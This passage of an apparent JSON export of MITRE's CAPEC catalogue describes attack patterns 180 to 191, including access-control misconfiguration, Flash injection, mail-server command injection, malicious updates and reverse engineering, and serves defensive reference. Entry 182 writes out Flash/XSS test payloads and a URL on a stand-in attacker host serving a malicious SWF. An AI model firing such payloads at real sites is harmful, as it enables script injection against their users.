configured.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"17"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user.","Technique":["Spider the web site for all available links.","Brute force to guess all function names/action with different privileges."]},{"Step":"2","Phase":"Experiment","Description":"[Identify weak points in access control configurations] The attacker probes the access control for functions and data identified in the Explore phase to identify potential weaknesses in how the access controls are configured.","Technique":["The attacker attempts authenticated access to targeted functions and data.","The attacker attempts unauthenticated access to targeted functions and data.","The attacker attempts indirect and side channel access to targeted functions and data."]},{"Step":"3","Phase":"Exploit","Description":"[Access the function or data bypassing the access control] The attacker executes the function or accesses the data identified in the Explore phase bypassing the access control.","Technique":"The attacker executes the function or accesses the data not authorized to them."}]},"Prerequisites":{"Prerequisite":"The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker\'s access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity.."},"Skills_Required":{"Skill":["In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Authorization","Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":"Design: Configure the access control correctly."},"Example_Instances":{"Example":"For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"1190"},{"CWE_ID":"1193"},{"CWE_ID":"1220"},{"CWE_ID":"1268"},{"CWE_ID":"1280"},{"CWE_ID":"1297"},{"CWE_ID":"1311"},{"CWE_ID":"1315"},{"CWE_ID":"1318"},{"CWE_ID":"1320"},{"CWE_ID":"1321"}]},"References":{"Reference":[{"External_Reference_ID":"REF-29"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}]}},"181":{"ID":"181","Name":"Flash File Overlay","Abstraction":"Detailed","Status":"Draft","Description":"An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"103","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The victim must be tricked into navigating to the attackers\' decoy site and performing the actions on the decoy page.","The victim\'s browser must support invisible Flash overlays."]},"Resources_Required":{"Resource":"The attacker must be able to force the Flash overlay over the decoy content."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"182":{"ID":"182","Name":"Flash Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"137"},{"Nature":"CanAlsoBe","CAPEC_ID":"248"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find Injection Entry Points] The attacker first takes an inventory of the entry points of the application.","Technique":["Spider the website for all available URLs that reference a Flash application.","List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies."]},{"Step":"2","Phase":"Experiment","Description":"[Determine the application\'s susceptibility to Flash injection] Determine the application\'s susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.","Technique":["Test the page using direct load asfunction, getURL,javascript:gotRoot(\\"\\")///d.jpg","Test the page using controlled evil page/host, http://example.com/evil.swf","Test the page using Flash HTML injection, \\"\'><img src=\'asfunction:getURL,javascript:gotRoot(\\"\\")//.jpg\' >","Test the page using DOM injection, (gotRoot(\'\'))"]},{"Step":"3","Phase":"Exploit","Description":"[Inject malicious content into target] Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase"}]},"Prerequisites":{"Prerequisite":"The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of Flash, especially how to insert content the executes commands.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The attacker may need to be able to serve the injected Flash content."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: remove sensitive information such as user name and password in the SWF file.","Implementation: use validation on both client and server side.","Implementation: remove debug information.","Implementation: use SSL when loading external data","Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain."]},"Example_Instances":{"Example":{"p":["In the following example, the SWF file contains","A request like","becomes"],"div":["getURL(\'javascript:SomeFunc(\\"someValue\\")\',\'\',\'GET\')",{"style":"margin-left:10px;","class":"informative"},"http://example.com/noundef.swf?a=0:0;alert(\'XSS\')",{"style":"margin-left:10px;","class":"informative"},"javascript:SomeFunc(\\"someValue\\")?a=0:0;alert(123)",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"184"},{"CWE_ID":"697"}]},"References":{"Reference":[{"External_Reference_ID":"REF-46"},{"External_Reference_ID":"REF-47"},{"External_Reference_ID":"REF-48"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"}]}},"183":{"ID":"183","Name":"IMAP/SMTP Command Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits weaknesses in input validation on IMAP/SMTP servers to execute commands on the server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Prerequisites":{"Prerequisite":["The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker.","The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server.","The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"References":{"Reference":{"External_Reference_ID":"REF-49","Section":"Testing for IMAP SMTP Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"184":{"ID":"184","Name":"Software Integrity Attack","Abstraction":"Meta","Status":"Draft","Description":"An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target\'s integrity to achieve an insecure state.","Typical_Severity":"Low","Skills_Required":{"Skill":["Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"}],"Previous_Entry_Name":["Software Integrity Attacks",{"Date":"2015-11-09"}]}},"185":{"ID":"185","Name":"Malicious Software Download","Abstraction":"Standard","Status":"Draft","Description":"An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanPrecede","CAPEC_ID":"662"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1105","Entry_Name":"Ingress Tool Transfer"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"186":{"ID":"186","Name":"Malicious Software Update","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an adversary controlled source. Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an adversary to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity. As such the attack employs \'spoofing\' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source. Virtually all software requires frequent updates or patches, giving the adversary immense latitude when structuring the attack, as well as many targets of opportunity. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively \'hook\' users while avoiding countermeasures such as spam filters or web security filters.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184"},{"Nature":"CanFollow","CAPEC_ID":"98"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target] The adversary must first identify what they want their target to be. Because malicious software updates can be carried out in a variety of ways, the adversary will first not only identify a target program, but also what users they wish to target. This attack can be targeted (a particular user or group of users) or untargeted (many different users)."},{"Step":"2","Phase":"Experiment","Description":"[Craft a deployment mechanism based on the target] The adversary must craft a deployment mechanism to deploy the malicious software update. This mechanism will differ based on if the attack is targeted or untargeted.","Technique":["Targeted attack: hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization\'s users requesting that they manually download and install the malicious software update.","Targeted attack: Instant Messaging virus payload, which harvests the names from a user\'s contact list and sends instant messages to those users to download and apply the update","Untargeted attack: Spam the malicious update to as many users as possible through unsolicited email, instant messages, or social media messages.","Untargeted attack: Send phishing emails to as many users as possible and pretend to be a legitimate source suggesting to download an important software update.","Untargeted attack: Use trojans/botnets to aid in either of the two untargeted attacks."]},{"Step":"3","Phase":"Exploit","Description":"[Deploy malicious software update] Using the deployment mechanism from the previous step, the adversary gets a user to install the malicious software update."}]},"Skills_Required":{"Skill":["This attack requires advanced cyber capabilities",{"Level":"High"}]},"Resources_Required":{"Resource":"Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code."},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands","Note":"Utilize the built-in software update mechanisms of the commercial components to deliver software that could compromise security credentials, enable a denial-of-service attack, or enable tracking."}},"Mitigations":{"Mitigation":"Validate software updates before installing."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Notes":{"Note":["Other class of attacks focus on firmware, where malicious updates are made to the core system firmware or BIOS. Since this occurs outside the controls of the operating system, the OS detection and prevention mechanisms do not aid, thus allowing an adversary to evade defenses as well as gain persistence on the target\'s system.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"187":{"ID":"187","Name":"Malicious Automated Software Update via Redirection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits two layers of weaknesses in server or client software for automated update mechanisms to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update. One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers\' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as \'evil twin\' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains. The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers\' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1072","Entry_Name":"Software Deployment Tools"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Architectural_Paradigms, Injection_Vector, Payload, Payload_Activation_Impact, References, Technical_Context"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Consequences, Description, Likelihood_Of_Attack, Taxonomy_Mappings"}],"Previous_Entry_Name":["Malicious Automated Software Update",{"Date":"2020-12-17"}]}},"188":{"ID":"188","Name":"Reverse Engineering","Abstraction":"Meta","Status":"Stable","Description":"An adversary discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or \\"back engineer\\" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices, or software, although the methodology and techniques involved in each type of analysis differ widely.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Prerequisites":{"Prerequisite":"Access to targeted system, resources, and information."},"Skills_Required":{"Skill":["Understanding of low level programming languages or technologies can be very helpful. For example, when reverse engineering a binary file, an understanding of assembly languages can help to determine the purpose and inner-workings of the code. Another example is reverse engineering an application that relies on networking. Here, an understanding networking protocols can provide insight into application details.",{"Level":"High"}]},"Resources_Required":{"Resource":"The technical resources necessary to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed."},"Mitigations":{"Mitigation":"Employ code obfuscation techniques to prevent the adversary from reverse engineering the targeted entity."},"Example_Instances":{"Example":"When adversaries are reverse engineering software, methodologies fall into two broad categories, \'white box\' and \'black box.\' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. \'Black Box\' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs."},"References":{"Reference":{"External_Reference_ID":"REF-50","Section":"Reverse engineering"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"}]}},"189":{"ID":"189","Name":"Black Box Reverse Engineering","Abstraction":"Standard","Status":"Draft","Description":"An attacker discovers the structure, function, and composition of a type of computer software through black box analysis techniques. \'Black Box\' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"188"}},"Resources_Required":{"Resource":"Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"203"},{"CWE_ID":"1255"},{"CWE_ID":"1300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Software Reverse Engineering",{"Date":"2015-11-09"}]}},"190":{"ID":"190","Name":"Reverse Engineer an Executable to Expose Assumed Hidden Functionality","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable. Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the \'black box\' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167","Exclude_Related":{"Exclude_ID":"515"}}},"Resources_Required":{"Resource":"Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"912"}},"References":{"Reference":[{"External_Reference_ID":"REF-51","Section":"Decompiler"},{"External_Reference_ID":"REF-52","Section":"Debugger"},{"External_Reference_ID":"REF-53","Section":"Disassembler"}]},"Notes":{"Note":{"Type":"Other","p":["White box analysis techniques include file or binary analysis, debugging, disassembly, and decompilation, and generally fall into categories referred to as \'static\' and \'dynamic\' analysis. Static analysis encompasses methods which analyze the binary, or extract its source code or object code without executing the program. Dynamic analysis involves analyzing the program during execution.","Some forms of file analysis tools allow the executable itself to be analyzed, the most basic of which can analyze features of the binary. More sophisticated forms of static analysis analyze the binary file and extract assembly code, and possibly source code representations, from analyzing the structure of the file itself. Dynamic analysis tools execute the binary file and monitor its in memory footprint, revealing its execution flow, memory usage, register values, and machine instructions. This type of analysis is most effective for analyzing the execution of binary files whose content has been obfuscated or encrypted in its native executable form.","Debuggers allow the program\'s execution to be monitored, and depending upon the debugger\'s sophistication may show relevant source code for each step in execution, or may display and allow interactions with memory, variables, or values generated by the program during run-time operations. Disassemblers operate in reverse of assemblers, allowing assembly code to be extracted from a program as it executes machine code instructions. Disassemblers allow low-level interactions with the program as it executes, such as manipulating the program\'s run time operations. Decompilers can be utilized to analyze a binary file and extract source code from the compiled executable. Collectively, the tools and methods described are those commonly applied to a binary executable file and provide means for reverse engineering the file by revealing the hidden functions of its operation or composition."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Other_Notes, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated @Name, Notes, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Reverse Engineer an Executable to Expose Assumed Hidden Functionality or Content",{"Date":"2019-04-04"}]}},"191":{"ID":"191","Name":"Read Sensitive Constants Within an Executable","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable.","These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user\'s authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include \'strings,\' \'grep,\' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.","Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic 